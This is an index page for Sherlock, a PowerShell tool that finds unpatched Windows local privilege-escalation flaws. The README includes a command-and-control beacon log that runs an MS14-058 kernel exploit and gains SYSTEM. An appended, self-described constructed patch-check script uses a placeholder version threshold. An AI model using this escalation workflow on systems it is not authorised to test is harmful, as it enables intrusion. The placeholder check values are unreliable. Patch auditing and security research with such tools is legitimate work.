Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/rasta-mouse/sherlock
PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
- Host: GitHub
- URL: https://github.com/rasta-mouse/sherlock
- Owner: rasta-mouse
- License: gpl-3.0
- Archived: true
- Created: 2017-04-02T16:01:53.000Z (over 7 years ago)
- Default Branch: master
- Last Pushed: 2018-10-10T09:10:45.000Z (about 6 years ago)
- Last Synced: 2024-05-02T02:23:16.617Z (7 months ago)
- Language: PowerShell
- Homepage:
- Size: 31.3 KB
- Stars: 1,837
- Watchers: 80
- Forks: 424
- Open Issues: 3
Metadata Files:
- Readme: README.md
- License: LICENSE
README
> Deprecated. Have a look at [Watson](https://github.com/rasta-mouse/Watson) instead.
# Sherlock
PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.
## Currently looks for:
* MS10-015 : User Mode to Ring (KiTrap0D)
* MS10-092 : Task Scheduler
* MS13-053 : NTUserMessageCall Win32k Kernel Pool Overflow
* MS13-081 : TrackPopupMenuEx Win32k NULL Page
* MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference
* MS15-051 : ClientCopyImage Win32k
* MS15-078 : Font Driver Buffer Overflow
* MS16-016 : 'mrxdav.sys' WebDAV
* MS16-032 : Secondary Logon Handle
* MS16-034 : Windows Kernel-Mode Drivers EoP
* MS16-135 : Win32k Elevation of Privilege
* CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 Priv Esc

## Basic Usage:
```
beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 20 bytes
[*] You are Win7-x64\Rasta

beacon> powershell-import C:\Users\Rasta\Desktop\Sherlock.ps1
[*] Tasked beacon to import: C:\Users\Rasta\Desktop\Sherlock.ps1
[+] host called home, sent: 2960 bytes

beacon> powershell Find-MS14058
[*] Tasked beacon to run: Find-MS14058
[+] host called home, sent: 20 bytes
[+] received output:

Title      : TrackPopupMenu Win32k Null Pointer Dereference
MSBulletin : MS14-058
CVEID      : 2014-4113
Link       : https://www.exploit-db.com/exploits/35101/
VulnStatus : Appears Vulnerable

beacon> elevate ms14-058 smb
[*] Tasked beacon to elevate and spawn windows/beacon_smb/bind_pipe (127.0.0.1:1337)
[+] host called home, sent: 105015 bytes
[+] received output:
[*] Getting Windows version...
[*] Solving symbols...
[*] Requesting Kernel loaded modules...
[*] pZwQuerySystemInformation required length 51216
[*] Parsing SYSTEM_INFO...
[*] 173 Kernel modules found
[*] Checking module \SystemRoot\system32\ntoskrnl.exe
[*] Good! nt found as ntoskrnl.exe at 0x0264f000
[*] ntoskrnl.exe loaded in userspace at: 40000000
[*] pPsLookupProcessByProcessId in kernel: 0xFFFFF800029A21FC
[*] pPsReferencePrimaryToken in kernel: 0xFFFFF800029A59D0
[*] Registering class...
[*] Creating window...
[*] Allocating null page...
[*] Getting PtiCurrent...
[*] Good! dwThreadInfoPtr 0xFFFFF900C1E7B8B0
[*] Creating a fake structure at NULL...
[*] Triggering vulnerability...
[!] Executing payload...

[+] host called home, sent: 204885 bytes
[+] established link to child beacon: 192.168.56.105

beacon> getuid
[*] Tasked beacon to get userid
[+] host called home, sent: 8 bytes
[*] You are NT AUTHORITY\SYSTEM (admin)
```
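The transcript above shows what a `Find-*` check returns, but not how such a check decides between "Appears Vulnerable" and "Not Vulnerable". The block below is an added example, not code from the Sherlock repository: it implements a generic version-comparison check (does the binary the fix replaced carry a version older than the one shipped in the update?) and emits the same Title/MSBulletin/CVEID/Link/VulnStatus object. The function names, the `$MS14058` table and the `FixedVersion` threshold are constructed for illustration; only the Title, MSBulletin, CVEID and Link strings come from the page, and the fixed-version value is a placeholder to be replaced with the figure from the bulletin.

```powershell
# Added example, not code from the Sherlock repository. Shows a version-based
# "is the fix installed?" check in the shape of a Sherlock Find-* function and
# emits the Title/MSBulletin/CVEID/Link/VulnStatus object seen in the beacon
# output above. $MS14058 is constructed: its FixedVersion is a PLACEHOLDER.

function Get-SystemFileVersion {
    param([Parameter(Mandatory)][string]$FileName)
    # A 32-bit PowerShell host on 64-bit Windows is redirected to SysWOW64; read
    # through the Sysnative alias so we inspect the binary the kernel actually loads.
    $sysDir = Join-Path $env:SystemRoot 'System32'
    if ([Environment]::Is64BitOperatingSystem -and -not [Environment]::Is64BitProcess) {
        $sysDir = Join-Path $env:SystemRoot 'Sysnative'
    }
    $path = Join-Path $sysDir $FileName
    if (-not (Test-Path -LiteralPath $path)) { return $null }
    $raw = [System.Diagnostics.FileVersionInfo]::GetVersionInfo($path).FileVersion
    # System binaries carry strings like "6.1.7601.17514 (win7sp1_rtm.101119-1850)";
    # keep only the leading dotted quad so [version] comparison works.
    if ($raw -match '^\s*(\d+\.\d+\.\d+\.\d+)') { return [version]$Matches[1] }
    return $null
}

function Get-OSBuildNumber {
    # [Environment]::OSVersion can be masked by compatibility shims on newer
    # Windows; CurrentBuild in the registry is what the update catalogue keys on.
    $key = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion'
    return [int](Get-ItemProperty -Path $key -Name CurrentBuild).CurrentBuild
}

function Test-MissingPatch {
    param(
        [Parameter(Mandatory)][hashtable]$Check,
        # Optional overrides so the decision logic can be exercised offline.
        [version]$FileVersion,
        [int]$Build
    )
    if (-not $PSBoundParameters.ContainsKey('Build')) { $Build = Get-OSBuildNumber }
    if (-not $PSBoundParameters.ContainsKey('FileVersion')) {
        $FileVersion = Get-SystemFileVersion -FileName $Check.File
    }

    if ($null -eq $FileVersion) {
        $status = 'Unknown: file not found'
    } elseif (-not $Check.FixedVersion.ContainsKey($Build)) {
        $status = 'Not Supported on this OS build'
    } elseif ($FileVersion -lt $Check.FixedVersion[$Build]) {
        # Older than the binary shipped with the fix: the update appears absent.
        $status = 'Appears Vulnerable'
    } else {
        $status = 'Not Vulnerable'
    }

    [PSCustomObject]@{
        Title      = $Check.Title
        MSBulletin = $Check.MSBulletin
        CVEID      = $Check.CVEID
        Link       = $Check.Link
        VulnStatus = $status
    }
}

# Constructed check definition. Title/MSBulletin/CVEID/Link are the values shown
# in the beacon output; win32k.sys is the driver MS14-058 patched; the
# FixedVersion per build is a PLACEHOLDER to be taken from the bulletin.
$MS14058 = @{
    Title        = 'TrackPopupMenu Win32k Null Pointer Dereference'
    MSBulletin   = 'MS14-058'
    CVEID        = '2014-4113'
    Link         = 'https://www.exploit-db.com/exploits/35101/'
    File         = 'win32k.sys'
    FixedVersion = @{ 7601 = [version]'6.1.7601.99999' }   # PLACEHOLDER
}

# Offline demonstration against a constructed host state: Windows 7 SP1 (build
# 7601) with a win32k.sys older than the placeholder fixed version.
Test-MissingPatch -Check $MS14058 -FileVersion ([version]'6.1.7601.17514') -Build 7601 | Format-List
# Same build with the fixed (or newer) binary present.
Test-MissingPatch -Check $MS14058 -FileVersion ([version]'6.1.7601.99999') -Build 7601 | Format-List
# Live run against the current machine.
Test-MissingPatch -Check $MS14058 | Format-List
```

Two caveats apply to any check of this kind, Sherlock's included. "Appears Vulnerable" only means the binary predates the fix; it says nothing about whether a given exploit works on that architecture, service pack or with the mitigations in place, which is why the transcript still has to run `elevate` to find out. And a check that reads the wrong file (the SysWOW64 copy from a 32-bit host, or a file cached by an update not yet applied after reboot) gives a confident but wrong answer, so run it from a process whose bitness matches the OS and treat the result as a lead, not a finding.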